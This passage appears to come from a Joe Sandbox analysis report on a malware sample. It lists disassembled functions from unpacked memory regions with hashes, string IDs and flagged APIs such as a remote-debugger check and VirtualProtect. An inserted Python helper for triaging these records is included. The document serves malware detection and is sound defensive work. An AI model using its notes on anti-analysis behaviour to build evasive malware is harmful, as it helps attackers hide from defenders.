7ffbac5add8d-7ffbac5add94 1428->1430 1431 7ffbac5addd2-7ffbac5addf5 1428->1431 1438 7ffbac5add9b-7ffbac5addb5 1430->1438 1442 7ffbac5addfb-7ffbac5ade49 1431->1442 1443 7ffbac5adef0-7ffbac5adefc 1431->1443 1435->1428 1436->1428 1438->1431 1449 7ffbac5addb7-7ffbac5addd0 1438->1449 1446 7ffbac5adcc4-7ffbac5adcd9 1441->1446 1447 7ffbac5ae18d-7ffbac5ae19e 1441->1447 1459 7ffbac5adee4-7ffbac5adeea 1442->1459 1460 7ffbac5ade4f-7ffbac5ade61 1442->1460 1443->1393 1448 7ffbac5adf02-7ffbac5adf17 1443->1448 1455 7ffbac5adce0-7ffbac5adce2 1446->1455 1448->1393 1449->1431 1455->1422 1456 7ffbac5adce4-7ffbac5add02 call 7ffbac5a9240 1455->1456 1456->1422 1459->1442 1459->1443 1460->1459 1464 7ffbac5ade67-7ffbac5ade6b 1460->1464 1464->1447 1465 7ffbac5ade71-7ffbac5adeb4 1464->1465 1465->1459 1471 7ffbac5adeb6-7ffbac5adee1 call 7ffbac5a9240 1465->1471 1471->1459
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy
                                                                        • API String ID: 0-2028992370
                                                                        • Opcode ID: 894b69988e407606d570f4e53c8326b356cdb3bf3c5f2231ebb1c2fd2dde3e52
                                                                        • Instruction ID: b22f74246b5b1ddd3f83128eff7f6025c258a3c8ffbc3d81af1f99ee6d5938fe
                                                                        • Opcode Fuzzy Hash: 894b69988e407606d570f4e53c8326b356cdb3bf3c5f2231ebb1c2fd2dde3e52
                                                                        • Instruction Fuzzy Hash: 073282B07199494FDB99EB2CD45DB7837D1EF59310B0541BAE84ECB2A2DE28EC42CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1476 7ffbac111268-7ffbac11126a 1477 7ffbac1112cb-7ffbac111310 1476->1477 1478 7ffbac11126c-7ffbac1112a5 1476->1478 1484 7ffbac111312-7ffbac111325 1477->1484 1485 7ffbac111327-7ffbac11135f 1477->1485 1484->1485 1491 7ffbac1113a1-7ffbac1113d0 1485->1491 1492 7ffbac111361-7ffbac111375 1485->1492 1494 7ffbac1113d2-7ffbac1113e5 1491->1494 1495 7ffbac1113e7-7ffbac1113e8 1491->1495 1494->1495 1497 7ffbac1113ef-7ffbac1113f6 1495->1497 1498 7ffbac1113fd-7ffbac11141f 1497->1498 1500 7ffbac111461-7ffbac111490 1498->1500 1501 7ffbac111421-7ffbac111435 1498->1501 1504 7ffbac111492-7ffbac1114a5 1500->1504 1505 7ffbac1114a7-7ffbac1114df 1500->1505 1504->1505 1510 7ffbac111521-7ffbac1115b6 1505->1510 1511 7ffbac1114e1-7ffbac1114f5 1505->1511 1517 7ffbac1115b8-7ffbac1115be 1510->1517 1518 7ffbac1115ca-7ffbac1115ce 1510->1518 1511->1510 1519 7ffbac1115d1-7ffbac1115d7 1517->1519 1522 7ffbac1115c0-7ffbac1115d7 1517->1522 1518->1519 1521 7ffbac1115dd-7ffbac1115f9 1519->1521 1527 7ffbac1115fb-7ffbac111616 1521->1527 1528 7ffbac111627-7ffbac11162e 1521->1528 1522->1521 1529 7ffbac111630-7ffbac111636 1528->1529 1530 7ffbac111633-7ffbac111636 1528->1530 1533 7ffbac11163d-7ffbac111828 1529->1533 1530->1533 1540 7ffbac111838-7ffbac111898 1533->1540 1541 7ffbac11182a-7ffbac111836 1533->1541 1544 7ffbac1118b6-7ffbac111961 1540->1544 1545 7ffbac11189a-7ffbac1118a1 1540->1545 1541->1540
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,__^
                                                                        • API String ID: 0-498113407
                                                                        • Opcode ID: 49f0baa9b70d3b04dfedee85d65ebfee262a2952dde9b3ed1ae6f01022a514a3
                                                                        • Instruction ID: df3e1050fd0402db2edfe53198ebca064d856bb738e41c43e9c2508f8fa771ee
                                                                        • Opcode Fuzzy Hash: 49f0baa9b70d3b04dfedee85d65ebfee262a2952dde9b3ed1ae6f01022a514a3
                                                                        • Instruction Fuzzy Hash: CCF10892B1E7DA4FD703A73CA8691E47FA0DF9622171900FBC589CB1A3DD18984BC361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: dffad97dc0547869fb4cacb73cbda5020fd8050f4b8bb7332205f41d1c36260e
                                                                        • Instruction ID: 72d258a0b0cb1ef2c0c527507903a30b0a12351dda8f7084bad07982068b10af
                                                                        • Opcode Fuzzy Hash: dffad97dc0547869fb4cacb73cbda5020fd8050f4b8bb7332205f41d1c36260e
                                                                        • Instruction Fuzzy Hash: 0641097180C7988FDB2ADB6898456E97FF0EF56321F04026FD08AD3293DE78644AC751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
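The record above is the one function in this listing with a non-empty API ID: CheckDebuggerPresentRemote, which is how the report's API ID field (the API name's CamelCase tokens in sorted order) renders CheckRemoteDebuggerPresent, the anti-debug check also flagged in the report's signature list. Every record in this listing is marked "based on PE: false", i.e. the code was dumped from memory that the sandbox could not map back to a PE image on disk, which is consistent with code unpacked or JIT-compiled at run time. The following script is an added example, not part of the Joe Sandbox report or of the sample; it parses records in the layout shown on this page, groups functions by the dumped region they came from, and flags API IDs that matter for anti-analysis triage. The sample text is constructed from three of the records on this page, and the watchlist of API-name tokens is an analyst's assumption rather than anything the report states.

```python
"""Triage helper for Joe Sandbox "Memory Dump Source" function records.

Added example for this report; not part of Joe Sandbox or of the sample.
Parses the per-function bullet records, groups them by dumped region and
flags API IDs that point at debugger or timing checks.
"""
import re
from collections import Counter

# Constructed sample: three records copied in the report's own layout.
SAMPLE_REPORT = """\
APIs
Memory Dump Source
• Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
Joe Sandbox IDA Plugin
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• Opcode ID: dffad97dc0547869fb4cacb73cbda5020fd8050f4b8bb7332205f41d1c36260e
• Instruction Fuzzy Hash: 0641097180C7988FDB2ADB6898456E97FF0EF56321F04026FD08AD3293DE78644AC751
Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
• API ID:
• String ID: gy$gy$gy$gy$gy$gy
• Opcode ID: 4434dbbe4da9e57014643dbf5d7e08b6b140db44190cbc67cda5e5c19783c355
• Instruction Fuzzy Hash: B542D6A1A0EB8A4FEBA7D73888596B57BE1EF46310F1801BBD44EC7193DA18DC46C351
Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
• API ID:
• String ID: XOx$XOx
• Opcode ID: 5059880750bdaa60b76465525d7294b9397d6bb2672149f53e06d5dc9a00bd5b
• Instruction Fuzzy Hash: 7FB1F4A1B0DA4A4FE79AD62D945A2B577D2EF89710F5401BFE44EC32D3DD18AC038392
Uniqueness Score: -1.00%
"""

BULLET_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*?)\s*$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)

# Analyst watchlist (assumption, not from the report): substrings of a sorted
# API ID that usually indicate debugger or timing checks.
ANTI_ANALYSIS_TOKENS = ("Debugger", "Sleep", "TickCount")


def parse_records(text):
    """Return one dict per "Memory Dump Source" record found in *text*."""
    records = []
    current = None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if current is None:
            continue
        m = BULLET_RE.match(line)
        if not m:
            continue  # headings such as "Similarity" carry no data
        key, value = m.group(1).strip(), m.group(2)
        if key == "Source File":
            s = SOURCE_RE.match(value)
            if s:
                current["dump_file"] = s.group("file")
                current["offset"] = int(s.group("offset"), 16)
                current["based_on_pe"] = s.group("pe") == "true"
        elif key == "API ID":
            current["api_id"] = value
        elif key == "String ID":
            current["string_id"] = value
        elif key == "Opcode ID":
            current["opcode_id"] = value
        elif key == "Instruction Fuzzy Hash":
            current["instr_fuzzy"] = value
    return records


def records_by_region(records):
    """Number of disassembled functions per dumped region, keyed by base offset."""
    return Counter(r["offset"] for r in records if "offset" in r)


def non_pe_regions(records):
    """Base offsets of regions the sandbox could not map to a PE image on disk."""
    return sorted({r["offset"] for r in records if r.get("based_on_pe") is False})


def anti_analysis_hits(records, watchlist=ANTI_ANALYSIS_TOKENS):
    """Records whose API ID contains a watchlisted token (e.g. CheckDebuggerPresentRemote)."""
    return [r for r in records if any(tok in r.get("api_id", "") for tok in watchlist)]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for offset, n in sorted(records_by_region(recs).items()):
        print(f"region {offset:#x}: {n} function(s)")
    for hit in anti_analysis_hits(recs):
        print(f"anti-analysis API {hit['api_id']} in region {hit['offset']:#x}, "
              f"instruction fuzzy hash {hit['instr_fuzzy'][:16]}...")
```

Run against the full report text, the region counts tell you which non-PE allocation holds the bulk of the unpacked payload, and the fuzzy hashes of the flagged functions are the values to pivot on in other reports or in a YARA rule for the anti-debug stub.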

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: j^_H
                                                                        • API String ID: 0-1457079288
                                                                        • Opcode ID: e08bd766eba8c8a6c861082e1ddc67dbddb23dfb516c631249e87dfd8262ff4f
                                                                        • Instruction ID: 5889ebd1dab3be123a9e9b6d884014bd17b674f0f9964e3cc98bad152ae94675
                                                                        • Opcode Fuzzy Hash: e08bd766eba8c8a6c861082e1ddc67dbddb23dfb516c631249e87dfd8262ff4f
                                                                        • Instruction Fuzzy Hash: 9D815F9551F7C52FD343B3B849AAAE6BFE0AE4B21074C49EED4CA8B1A3C90C6517D341
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6436a666cfe1187564b78d053b4c100ddd4e9e4d9efb6691d991e265b4f4b15
                                                                        • Instruction ID: 76825579df478adf52a161d339ea6883bc7b25ea9a8c825128e94ef04e5b815a
                                                                        • Opcode Fuzzy Hash: f6436a666cfe1187564b78d053b4c100ddd4e9e4d9efb6691d991e265b4f4b15
                                                                        • Instruction Fuzzy Hash: 31626270609A498FEB95EB2CC459B797BE1FF99301F1445BAE48DC72A2DE34E842C701
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f1ece61dd9ff578e632fbe7a7e0949fb04437d36a9f0f2eedf9b4f871d6e58be
                                                                        • Instruction ID: 55bb91585e9c7d261c5ba661f88ebfd068600047f73d74661bfc2aa1aa1fb436
                                                                        • Opcode Fuzzy Hash: f1ece61dd9ff578e632fbe7a7e0949fb04437d36a9f0f2eedf9b4f871d6e58be
                                                                        • Instruction Fuzzy Hash: 05F1C770A18A8D8FEBA9DF28C8497E937D1FF54310F04426ED85DC7291DB38E9458B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c193170595b56b585c3ca31a47ba355342066d40266fea2d3a81ba8169b5ddb
                                                                        • Instruction ID: fa99d434ff443bf6240775224dee73daf2a4206a0ecd518b364bd37aa2097508
                                                                        • Opcode Fuzzy Hash: 1c193170595b56b585c3ca31a47ba355342066d40266fea2d3a81ba8169b5ddb
                                                                        • Instruction Fuzzy Hash: 20E1D570A08A4E8FEBAADF28C8597E93BD1FF55310F14426EE84DC7291DE78D8458781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 449c722f3e2de9011d554c52817ec182aa2dd76522784c0f8fc804d1b6f7f135
                                                                        • Instruction ID: bb1ff42a954a65a41326b653bb49ee1c5d5c864b7aaa264a1765c51571cc3b71
                                                                        • Opcode Fuzzy Hash: 449c722f3e2de9011d554c52817ec182aa2dd76522784c0f8fc804d1b6f7f135
                                                                        • Instruction Fuzzy Hash: 5AC141B1E18A198FDB58DA29C449779B3E1FF98301F1445BEE44EE3691CE35EC828B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 7ffbac1e1139; basic blocks extend to 7ffbac1e1dfe. The executed/not-executed block colouring and the Graphviz node/edge listing are not reproduced here.
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy$gy$gy$gy$gy$gy
                                                                        • API String ID: 0-1645249843
                                                                        • Opcode ID: 4434dbbe4da9e57014643dbf5d7e08b6b140db44190cbc67cda5e5c19783c355
                                                                        • Instruction ID: 5551db038da31c9ad4457be4554bfe13a6b06b705598977684300271b2a2fcbd
                                                                        • Opcode Fuzzy Hash: 4434dbbe4da9e57014643dbf5d7e08b6b140db44190cbc67cda5e5c19783c355
                                                                        • Instruction Fuzzy Hash: B542D6A1A0EB8A4FEBA7D73888596B57BE1EF46310F1801BBD44EC7193DA18DC46C351
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 7ffbac1e08e9; basic blocks extend to 7ffbac1e0dd1. The executed/not-executed block colouring and the Graphviz node/edge listing are not reproduced here.
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: R_H$gy$gy
                                                                        • API String ID: 0-3948475402
                                                                        • Opcode ID: c79e4893155556e6d10886fb98a005cf994e9f7c0ab82209fd4495f18a802b39
                                                                        • Instruction ID: 95c740ffb95eb9917c9ce0604de113b55a0c26a42d18c0672a1192e6dc3d35c6
                                                                        • Opcode Fuzzy Hash: c79e4893155556e6d10886fb98a005cf994e9f7c0ab82209fd4495f18a802b39
                                                                        • Instruction Fuzzy Hash: 70F106A1A0EA9A4FEBA7E73888585B47BE1EF55314B0802FED44EC71D3DE18D806C355
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 7ffbac1e0999; basic blocks extend to 7ffbac1e0dd1 (the same code region as the function starting at 7ffbac1e08e9). The executed/not-executed block colouring and the Graphviz node/edge listing are not reproduced here.
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: R_H$gy$gy
                                                                        • API String ID: 0-3948475402
                                                                        • Opcode ID: 0a86dc281b5a511c5222f1813e1a1c7a51c0b899a753e3d6c8515cf34a718d00
                                                                        • Instruction ID: 177298766b07f7abc9046f745c8a845fa46aa482caff809e7957a55f0718a6c4
                                                                        • Opcode Fuzzy Hash: 0a86dc281b5a511c5222f1813e1a1c7a51c0b899a753e3d6c8515cf34a718d00
                                                                        • Instruction Fuzzy Hash: 4F7118B1A0EA5A4FEBA7DB3884582757BE1EF94314F1902BBC84DC7293CA28DC45C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 7ffbac1e57bb; basic blocks extend to 7ffbac1e5d7b. The executed/not-executed block colouring and the Graphviz node/edge listing are not reproduced here.
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy$gy
                                                                        • API String ID: 0-417113342
                                                                        • Opcode ID: cd723a0def1b66036e00b1a05bc891882c41bb72db398f9ed7a907a02c9a648f
                                                                        • Instruction ID: 18ba1302ba2770867150b8af8ae88d7b6c38397369debf972bcce86abbc60dfd
                                                                        • Opcode Fuzzy Hash: cd723a0def1b66036e00b1a05bc891882c41bb72db398f9ed7a907a02c9a648f
                                                                        • Instruction Fuzzy Hash: C72239B1A0EB9D4FEF97E62898595B53BE2EF86324B0801BBD44DC7193DA14EC06C351
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 7ffbac5ae1a1; basic blocks extend to 7ffbac5ae51b; calls 7ffbac5ab550. The executed/not-executed block colouring and the Graphviz node/edge listing are not reproduced here.
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: XOx$XOx
                                                                        • API String ID: 0-3878675519
                                                                        • Opcode ID: 5059880750bdaa60b76465525d7294b9397d6bb2672149f53e06d5dc9a00bd5b
                                                                        • Instruction ID: 989c81b41fe3c6526cf802cc98eec5c76256f4da2b59c966c25eba845e3493ea
                                                                        • Opcode Fuzzy Hash: 5059880750bdaa60b76465525d7294b9397d6bb2672149f53e06d5dc9a00bd5b
                                                                        • Instruction Fuzzy Hash: 7FB1F4A1B0DA4A4FE79AD62D945A2B577D2EF89710F5401BFE44EC32D3DD18AC038392
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph of executed / not executed blocks; raw node and edge dump not reproduced)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx$XOx
                                                                        • API String ID: 0-51357738
                                                                        • Opcode ID: 5e3ae69d98ed1d242ee2e8faaae67d8e4b281d66d69b70c337249627dcba0dd5
                                                                        • Instruction ID: 9789bd2c0292fbcd16e7c1fc2eeb9ed74d09e3d2f0d6695c46313f0debd314b3
                                                                        • Opcode Fuzzy Hash: 5e3ae69d98ed1d242ee2e8faaae67d8e4b281d66d69b70c337249627dcba0dd5
                                                                        • Instruction Fuzzy Hash: 5691E5F1B1EA4A4FEB96E73DD45E67567D1EF99210B4801FAE44EC7292DD18EC028380
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph of executed / not executed blocks; raw node and edge dump not reproduced)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy$gy
                                                                        • API String ID: 0-417113342
                                                                        • Opcode ID: b722a732a13b2f2fa7eadbdbe24d8c93a04a610705ba997a85eef38bf7938f0d
                                                                        • Instruction ID: 908a28cf2b751e075b8748f5bbb9a72815c69d34d948bba34eb65b0a7d77f20e
                                                                        • Opcode Fuzzy Hash: b722a732a13b2f2fa7eadbdbe24d8c93a04a610705ba997a85eef38bf7938f0d
                                                                        • Instruction Fuzzy Hash: A211EBE2F1EA164FFAABD22C54151B856D2EF46210B5811BFD90FC7297DD0CDC05C249
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3474439df4bc032862aa079e32ee9870c9a7d7dbecdb70cd6f3228509eb5aea1
                                                                        • Instruction ID: 59943916fc18d5dc29607f9e861cbbdd0d6ecfb3470eba589150bb22303a6047
                                                                        • Opcode Fuzzy Hash: 3474439df4bc032862aa079e32ee9870c9a7d7dbecdb70cd6f3228509eb5aea1
                                                                        • Instruction Fuzzy Hash: A651497190DB884FD706DB7888596F9BFE0EF56310B0842BFD089D71A3DA28A84BC751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy
                                                                        • API String ID: 0-2028992370
                                                                        • Opcode ID: 0aadd9dd90202391b51a3213d28ef631a26b9c360018eccfdc469d34606da6a0
                                                                        • Instruction ID: e2d7828f0ae1c609a2e48385552ed61d8d3fab3dc7004d1b5ed273a3940a5eaf
                                                                        • Opcode Fuzzy Hash: 0aadd9dd90202391b51a3213d28ef631a26b9c360018eccfdc469d34606da6a0
                                                                        • Instruction Fuzzy Hash: 6DD195B06199494FDB89EB2CC45DA797BD1FF59310B1501BAE84ECB2A3DE24EC42CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 898b657b336d90ce925a6a8f7d6c28320f8bf02668b7e42612413eb6c639e997
                                                                        • Instruction ID: 74d003f045dd685882b2eacfb8d22317f7724f0881a48c4b929b8bdd8131accd
                                                                        • Opcode Fuzzy Hash: 898b657b336d90ce925a6a8f7d6c28320f8bf02668b7e42612413eb6c639e997
                                                                        • Instruction Fuzzy Hash: 7C31167190CB5C4FDB19DB6C980A6ED7BE1EB95321F04436FE049D3292CA74A806C792
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx
                                                                        • API String ID: 0-98221368
                                                                        • Opcode ID: 66fe844af0d9b3edf0872cd29ebef5527788e058f55566d050971fe41c8e0ac7
                                                                        • Instruction ID: 584349be46635513be5b89c6d3e631cfd81bff1585355136354e60cefd713823
                                                                        • Opcode Fuzzy Hash: 66fe844af0d9b3edf0872cd29ebef5527788e058f55566d050971fe41c8e0ac7
                                                                        • Instruction Fuzzy Hash: 5CB192B0A18A1D8FDB98EB29D44DBB977E1FF99310F04417AE45EC3292DE34E8418B41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 48aff3e99a3fa8090156df90778536c95f06f50005a18576594712fbb85f6f45
                                                                        • Instruction ID: 4fef6d4918e8a135fbcbf29f92a82303714b5e9439b947c7898b02958e928772
                                                                        • Opcode Fuzzy Hash: 48aff3e99a3fa8090156df90778536c95f06f50005a18576594712fbb85f6f45
                                                                        • Instruction Fuzzy Hash: 7431FE7190CB1C8FDB19DB68D849AE9BBF0EF65311F04422FD04AD3262DB74A846CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx
                                                                        • API String ID: 0-98221368
                                                                        • Opcode ID: a14325dbbddeaae1a60f9fcd054aa20db341e51437b3d311720e08f1f69d5f39
                                                                        • Instruction ID: b02a7c1312af9c365be23461737e604e3017e9c0de53321b30efb362cb4e570b
                                                                        • Opcode Fuzzy Hash: a14325dbbddeaae1a60f9fcd054aa20db341e51437b3d311720e08f1f69d5f39
                                                                        • Instruction Fuzzy Hash: E7B109B160DA8A4FE766E778D8AA5B47BE0EF56310B0801FBD48DCF193D91DAC468341
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (;y
                                                                        • API String ID: 0-1926527261
                                                                        • Opcode ID: 5a241b6def18b7efbb5684da0fe1b68ccf1f55ac169fe2549104dc1ad98ee911
